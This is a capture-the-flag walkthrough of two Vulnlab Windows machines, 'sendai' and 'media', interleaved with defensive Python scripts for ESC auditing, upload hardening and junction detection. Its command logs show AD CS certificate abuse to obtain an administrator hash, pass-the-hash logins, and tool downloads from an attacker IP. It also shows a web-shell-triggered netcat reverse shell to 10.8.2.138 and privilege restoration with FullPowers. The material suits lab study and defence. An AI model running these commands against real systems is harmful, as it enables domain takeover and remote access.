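        if isinstance(node, dict):
            if "Template Name" in node:
                escs: Dict[str, str] = {}
                collect_esc(node, escs)
                if escs:
                    found[node["Template Name"]] = escs
                return
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(data)
    return found


def changed_escs(before: Any, after: Any) -> Dict[str, Set[str]]:
    """ESC codes per template that are new, or whose finding text changed, between two runs.

    A template that suddenly gains ESC1/ESC2/ESC3, or whose ESC4 principal widens
    from a small group to Authenticated Users, has been edited and should be alerted on.
    """
    old = esc_findings(before)
    new = esc_findings(after)
    diff: Dict[str, Set[str]] = {}
    for template, escs in new.items():
        previous = old.get(template, {})
        changed = {code for code, text in escs.items() if previous.get(code) != text}
        if changed:
            diff[template] = changed
    return diff


# Constructed sample exports mirroring the two certipy-ad find runs above
# (key names other than "Template Name" are assumed; the walker ignores them).
BEFORE = {
    "Certificate Authorities": {"0": {"CA Name": "sendai-DC-CA", "DNS Name": "dc.sendai.vl"}},
    "Certificate Templates": {
        "0": {
            "Template Name": "SendaiComputer",
            "Display Name": "SendaiComputer",
            "[!] Vulnerabilities": {"ESC4": "'SENDAI.VL\\ca-operators' has dangerous permissions"},
        },
        "1": {"Template Name": "User", "Display Name": "User"},
    },
}

AFTER = {
    "Certificate Authorities": {"0": {"CA Name": "sendai-DC-CA", "DNS Name": "dc.sendai.vl"}},
    "Certificate Templates": {
        "0": {
            "Template Name": "SendaiComputer",
            "Display Name": "SendaiComputer",
            "[!] Vulnerabilities": {
                "ESC1": "'SENDAI.VL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
                "ESC2": "'SENDAI.VL\\Authenticated Users' can enroll and template can be used for any purpose",
                "ESC3": "'SENDAI.VL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
                "ESC4": "'SENDAI.VL\\Authenticated Users' has dangerous permissions",
            },
        },
        "1": {"Template Name": "User", "Display Name": "User"},
    },
}


if __name__ == "__main__":
    # Usage: python esc_diff.py <before_Certipy.json> <after_Certipy.json>
    import sys

    with open(sys.argv[1]) as f_before, open(sys.argv[2]) as f_after:
        for template, codes in changed_escs(json.load(f_before), json.load(f_after)).items():
            print(template, sorted(codes))
```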

Request Administrator Cert

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace

Fixed the “NETBIOS connection with the remote host timed out” error by changing the order of the /etc/hosts entries to:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat /etc/hosts | grep sendai
10.10.69.199 sendai.vl dc.sendai.vl

Try again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Obtain a TGT and the Administrator hash

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cf<REDACTED>7a
                                                                                               
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u administrator -H cf<REDACTED>7a
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/18/2023   6:15 AM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{ae<REDACTED>61}
*Evil-WinRM* PS C:\Users\Administrator\desktop>

That’s all.

Another way to root (not finished yet)

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
ticketer.py: command not found
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-ticketer -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                         

Set up a chisel listener

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ chisel server -p 8001 --reverse
2024/06/14 08:21:52 server: Reverse tunnelling enabled
2024/06/14 08:21:52 server: Fingerprint 6C2g9JWtYeT92LZsgr5dckEz87F24T+dsXH6dsDjhDo=
2024/06/14 08:21:52 server: Listening on http://0.0.0.0:8001
2024/06/14 08:24:27 server: session#1: Client version (1.9.1) differs from server version (1.9.1-0kali1)
2024/06/14 08:24:27 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Then:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ export KRB5CCNAME=Administrator.ccache          
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains impacket-mssqlclient dc.sendai.vl -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.sendai.vl:1433  ...  OK
[*] Encryption required, switching to TLS
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]

And from the sendai box:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload chisel.exe
                                        
Info: Uploading /home/puck/vulnlab/sendai/chisel.exe to C:\temp\chisel.exe
                                        
Data: 12008104 bytes of 12008104 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\temp> ./chisel.exe client 10.8.2.138:8001 R:1080:socks
chisel.exe : 2024/06/14 05:24:26 client: Connecting to ws://10.8.2.138:8001
    + CategoryInfo          : NotSpecified: (2024/06/14 05:2...10.8.2.138:8001:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/06/14 05:24:26 client: Connected (Latency 20.3373ms)

work in progress

Chisel itself is working fine:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains curl http://127.0.0.1     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:80  ...  OK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
    }

a img {
    border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>                                                                                                                             

Something must be wrong with my impacket-mssqlclient: “Encryption required, switching to TLS”.

vulnlab-media

vulnlab media

a medium Windows machine

Tools used : ntlm_theft , fullpowers.exe , godpotato.exe

First, upload a video file, catch the hash with Responder, and crack it with John.

Then SSH into the box.

Examine index.php, and query the ApacheHTTPServer service in the registry for a clue about what to do.

PS C:\xampp\htdocs> reg query "HKLM\SYSTEM\CurrentControlSet\services\ApacheHTTPServer"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer
    Type    REG_DWORD    0x10
    Start    REG_DWORD    0x2
    ErrorControl    REG_DWORD    0x1
    ImagePath    REG_EXPAND_SZ    "C:\Xampp\apache\bin\httpd.exe" -k runservice
    DisplayName    REG_SZ    Apache HTTP Server
    DependOnService    REG_MULTI_SZ    Tcpip\0Afd
    ObjectName    REG_SZ    NT AUTHORITY\Local Service
    Description    REG_SZ    Apache/2.4.56 (Win64)
    FailureActions    REG_BINARY    0000000000000000000000000300000014000000010000001400000001000000140000000100000014000000
    RequiredPrivileges    REG_MULTI_SZ    SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeIncreaseWorkingSetPrivilege\0SeTcbPrivilege\0SeTimeZonePrivilege

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer\Parameters
PS C:\xampp\htdocs> cat index.php                                                                                    
<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";
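
The folder and filename derivation above is what makes the upload location predictable: the folder is an unsalted MD5 of the three form fields, and the filename filter removes characters but never checks the extension. As an added example, not code from the writeup or the lab, this Python models that derivation next to a hardened variant (random folder name, extension allowlist); the allowed-extension set is an assumption, and the PHP's FILTER_SANITIZE_STRING step on the form fields is not modelled.

```python
import hashlib
import re
import secrets
from typing import Optional

# Mirrors index.php above (constructed model, not the lab's own code).
UPLOAD_DIR = "C:/Windows/Tasks/Uploads/"
SANITIZE_RE = re.compile(r"[^a-zA-Z0-9._]")

# Assumed allowlist for the hardened variant: the form asks for a video.
ALLOWED_EXT = {"mp4", "mov", "webm"}


def upload_folder(firstname: str, lastname: str, email: str) -> str:
    """Folder name exactly as index.php derives it: md5(firstname . lastname . email).

    Nothing secret and no separator goes into the hash, so anyone who knows the
    three submitted values can recompute the folder, and different field splits
    that concatenate to the same string land in the same folder.
    """
    return hashlib.md5((firstname + lastname + email).encode()).hexdigest()


def sanitize_filename(name: str) -> str:
    """Same character filter as index.php: everything outside [a-zA-Z0-9._] is dropped.

    This stops path separators, so traversal via the filename fails, but a name
    like shell.php passes untouched because no extension check exists.
    """
    return SANITIZE_RE.sub("", name)


def target_path(firstname: str, lastname: str, email: str, filename: str) -> str:
    """Full on-disk path the PHP would write to for a given submission."""
    return UPLOAD_DIR + upload_folder(firstname, lastname, email) + "/" + sanitize_filename(filename)


def hardened_target_path(filename: str) -> Optional[str]:
    """Hardened variant (added here): unguessable per-upload folder plus an extension allowlist.

    Returns None when the upload must be rejected. A fresh random folder per
    upload also means no pre-existing directory is reused, so a directory that
    was swapped for a junction beforehand is never written into.
    """
    base = sanitize_filename(filename)
    if not base or base.count(".") != 1:        # reject empty names and double extensions
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    return UPLOAD_DIR + secrets.token_hex(16) + "/" + base
```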

 

Make everything ready as below:

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ ssh enox@media.vl
enox@media.vl's password: 

Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

enox@MEDIA C:\Users\enox>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

enox@MEDIA C:\Users\enox>cd cd:\xamp
The filename, directory name, or volume label syntax is incorrect.

enox@MEDIA C:\Users\enox>cd c:\

enox@MEDIA c:\>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\

05/08/2021  01:20 AM    <DIR>          PerfLogs
10/10/2023  06:32 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
10/02/2023  10:26 AM    <DIR>          Users
10/10/2023  06:41 AM    <DIR>          Windows
10/02/2023  11:03 AM    <DIR>          xampp
               0 File(s)              0 bytes
               6 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\>cd xampp

enox@MEDIA c:\xampp>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp

10/02/2023  11:03 AM    <DIR>          .
10/02/2023  10:57 AM    <DIR>          apache
06/07/2013  11:15 AM               436 apache_start.bat
10/01/2019  07:13 AM               190 apache_stop.bat
04/05/2021  04:16 PM            10,324 catalina_service.bat
04/05/2021  04:17 PM             3,766 catalina_start.bat
04/05/2021  04:17 PM             3,529 catalina_stop.bat
10/02/2023  10:57 AM    <DIR>          cgi-bin
10/02/2023  10:57 AM    <DIR>          contrib
10/02/2023  10:57 AM    <DIR>          FileZillaFTP
10/02/2023  10:27 AM    <DIR>          htdocs
10/02/2023  10:57 AM    <DIR>          install
10/02/2023  10:57 AM    <DIR>          licenses
10/02/2023  10:57 AM    <DIR>          locale
10/02/2023  10:57 AM    <DIR>          MercuryMail
10/02/2023  10:57 AM    <DIR>          mysql
06/03/2019  11:39 AM               471 mysql_start.bat
10/01/2019  07:13 AM               270 mysql_stop.bat
03/13/2017  11:04 AM               824 passwords.txt
10/02/2023  10:58 AM    <DIR>          perl
10/02/2023  11:01 AM    <DIR>          php
10/02/2023  11:03 AM    <DIR>          phpMyAdmin
04/06/2023  09:04 AM             7,653 readme_de.txt
04/06/2023  09:04 AM             7,515 readme_en.txt
10/02/2023  11:03 AM    <DIR>          sendmail
11/12/2015  05:13 PM               370 setup_xampp.bat
11/29/2020  02:38 PM             1,671 test_php.bat
06/13/2024  06:46 AM    <DIR>          tmp
10/02/2023  11:03 AM    <DIR>          tomcat
10/02/2023  11:03 AM    <DIR>          webalizer
10/02/2023  11:03 AM    <DIR>          webdav
04/06/2021  11:38 AM         3,368,448 xampp-control.exe
04/05/2021  04:08 PM               978 xampp-control.ini
03/30/2013  12:29 PM           118,784 xampp_start.exe
03/30/2013  12:29 PM           118,784 xampp_stop.exe
              16 File(s)      3,644,013 bytes
              19 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\xampp>cd htdocs

enox@MEDIA c:\xampp\htdocs>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp\htdocs

10/02/2023  10:27 AM    <DIR>          .
10/02/2023  11:03 AM    <DIR>          ..
10/02/2023  10:27 AM    <DIR>          assets
10/02/2023  10:27 AM    <DIR>          css
10/10/2023  05:00 AM            20,563 index.php
10/02/2023  10:27 AM    <DIR>          js
               1 File(s)         20,563 bytes
               5 Dir(s)   8,501,620,736 bytes free

enox@MEDIA c:\xampp\htdocs>cd C:\Windows\Tasks\Uploads\

enox@MEDIA C:\Windows\Tasks\Uploads>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads

06/13/2024  06:46 AM    <DIR>          .
10/02/2023  11:04 AM    <DIR>          ..
06/13/2024  06:46 AM    <DIR>          1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024  06:46 AM                 0 todo.txt
               1 File(s)              0 bytes
               3 Dir(s)   8,501,604,352 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
The directory is not empty.

enox@MEDIA C:\Windows\Tasks\Uploads>cd 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d

06/13/2024  06:46 AM    <DIR>          .
06/13/2024  06:46 AM    <DIR>          ..
06/13/2024  06:46 AM                37 shell.php
               1 File(s)             37 bytes
               2 Dir(s)   8,499,552,256 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>del *.*   
           C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d\*.*, Are you sure (Y/N)? y

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>cd ..

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads>cd C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mklink /J C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d <<===>> C:\xampp\htdocs
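The junction above is what turns a harmless upload folder into a write into the web root: anything saved under C:\Windows\Tasks\Uploads\<hash>\ is really written to C:\xampp\htdocs. A defender can catch this pattern by walking the upload directory and flagging any reparse point (junction or symlink) whose resolved target lies outside it. The following audit script is an added example for this writeup, not code from the original page or from any tool used in it; the sample tree that build_demo_tree() creates is constructed here to imitate the writeup's layout, with a symlink standing in for the `mklink /J` junction so the demo also runs on Linux.

```python
"""Audit an upload directory for junctions/symlinks that escape it.

Added example for this writeup, not code from the original page or from any
tool used in it. The sample tree built by build_demo_tree() is constructed to
imitate the writeup's layout (an Uploads folder and a separate web root); the
hash-named link stands in for the `mklink /J` junction shown above.
"""
import os
import stat
import tempfile


def is_reparse_point(path: str) -> bool:
    """True for a symlink on any OS, and for an NTFS junction on Windows.

    A junction is a reparse point but not a symlink, so os.path.islink()
    misses it; st_file_attributes (Windows only) catches both kinds.
    """
    try:
        st = os.lstat(path)
    except OSError:
        return False
    attrs = getattr(st, "st_file_attributes", 0)
    if attrs & getattr(stat, "FILE_ATTRIBUTE_REPARSE_POINT", 0):
        return True
    return stat.S_ISLNK(st.st_mode)


def _inside(base_real: str, target: str) -> bool:
    try:
        return os.path.commonpath([base_real, target]) == base_real
    except ValueError:  # different drives on Windows: certainly outside
        return False


def find_escaping_links(base: str) -> list:
    """Return (link path relative to base, resolved target) for every reparse
    point under base whose target is outside base. Linked directories are
    pruned from the walk, so a junction loop cannot make it run forever."""
    base_real = os.path.realpath(base)
    findings = []
    for root, dirs, files in os.walk(base, followlinks=False):
        for name in dirs + files:
            p = os.path.join(root, name)
            if not is_reparse_point(p):
                continue
            target = os.path.realpath(p)
            if not _inside(base_real, target):
                findings.append((os.path.relpath(p, base), target))
        dirs[:] = [d for d in dirs if not is_reparse_point(os.path.join(root, d))]
    return sorted(findings)


def build_demo_tree() -> dict:
    """Construct a throwaway tree: Uploads/ with an empty todo.txt, a harmless
    link that stays inside Uploads, and a hash-named link pointing at the web
    root (the pattern from the writeup). Returns the paths used."""
    top = tempfile.mkdtemp(prefix="junction-audit-")
    uploads = os.path.join(top, "Uploads")
    htdocs = os.path.join(top, "htdocs")
    os.makedirs(os.path.join(uploads, "legit"))
    os.makedirs(htdocs)
    open(os.path.join(uploads, "todo.txt"), "w").close()
    # symlinks stand in for junctions so the demo also runs on Linux/macOS
    os.symlink(htdocs, os.path.join(uploads, "1bad4a5f2408292f03b2bfc5a1edd51d"),
               target_is_directory=True)
    os.symlink(os.path.join(uploads, "legit"), os.path.join(uploads, "alias"),
               target_is_directory=True)
    return {"uploads": uploads, "htdocs_real": os.path.realpath(htdocs)}


if __name__ == "__main__":
    demo = build_demo_tree()
    for link, target in find_escaping_links(demo["uploads"]):
        print(f"ESCAPING LINK: {link} -> {target}")
```

Run against the real upload root on the server (for example `find_escaping_links(r"C:\Windows\Tasks\Uploads")`), the only expected output is nothing; the link that stays inside the folder is deliberately not reported, so the check does not fire on legitimate internal aliases. The lasting fix is to deny the web server's account the right to create reparse points in the upload folder and to make the uploading code open files with FILE_FLAG_OPEN_REPARSE_POINT semantics or reject paths whose realpath leaves the folder.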

enox@MEDIA C:\xampp\htdocs>mkdir c:\temp

enox@MEDIA C:\xampp\htdocs>cd c:\temp

enox@MEDIA c:\temp> powershell                                      
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  iwr http://10.8.2.138/nc64.exe -outfile nc64.exe
PS C:\temp>  iwr http://10.8.2.138/FullPowers.exe -outfile FullPowers.exe 
PS C:\temp> iwr http://10.8.2.138/GodPotato.exe -outfile gp.exe

Upload shell.php again (with the same name) to the website http://media.vl; because of the junction it now lands in C:\xampp\htdocs.

Trigger the shell:

──(puck㉿kali)-[~/vulnlab/media]
└─$ curl http://media.vl/shell.php?cmd=c:\\temp\\nc64.exe+-e+cmd.exe+10.8.2.138+443

.

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50353
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State   
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled 
SeCreateGlobalPrivilege       Create global objects               Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled


C:\xampp\htdocs>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
[+] Started dummy thread with id 4104
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PS C:\temp> 

with another listener running:

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50388
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-87-343222087-845000640-1675840783-1352364494-2876961185                                    Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
